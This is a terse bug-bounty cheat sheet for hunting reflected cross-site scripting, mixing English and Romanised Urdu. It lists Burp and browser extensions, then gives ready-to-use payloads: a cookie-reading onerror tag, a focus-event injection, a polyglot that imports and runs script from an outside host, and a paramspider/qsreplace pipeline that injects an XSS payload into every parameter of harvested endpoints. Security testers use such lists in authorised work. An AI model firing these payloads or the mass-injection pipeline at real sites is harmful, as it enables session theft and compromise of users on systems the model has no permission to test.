👑Find Reflected - XSS (CWE-79)
<img src="x" onerror="alert(document.cookie);"
<a AutoFocus contenteditable OnFocus="prompt`${1}`;"Manual Testing during Automation
On Burp and Add to Scope
Turn on Burp Extensions to find Reflected XSS: Reflection + Reflector + isXSS + HopLa + Hackbar + Reflection-Tracer
Turn on Crome Extention : Xnl Reveal
Turn on Crome Extention: link Gopher and linkg rabber
Turn on Crome Extention: input Hidden Moniter
Turn on Burp Extention to TRACK OF TESTED ENDPOINTS: BURP SCOPE MONITOR
website ko explore karty time hum her ek endpoint me Parameter me Probe Add karen gy
website ko explore karty time hum her ek endpoint pe Source-code me
type="hidden" + type="hidden" + value="" + getparam
URL Source Code me <Script> tags k ander a raha ha hum payload laga dy gy
"-confirm(1)-"
-------------------------------------------------------------
This Polyglot works for most HTML and JS injection scenarios
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is/.source))//> -------------------------------------------------------------
Find RXSS Using Automation
paramspider -l livesubdomains.txt
cat all_endpoints.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | freq | tee -a possible_xss.txtcat parameters.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | tee -a xss_fuzz.txtcat xss_fuzz.txt | freq | tee -a possible_xss.txt-------------------------------------------------------------
Last updated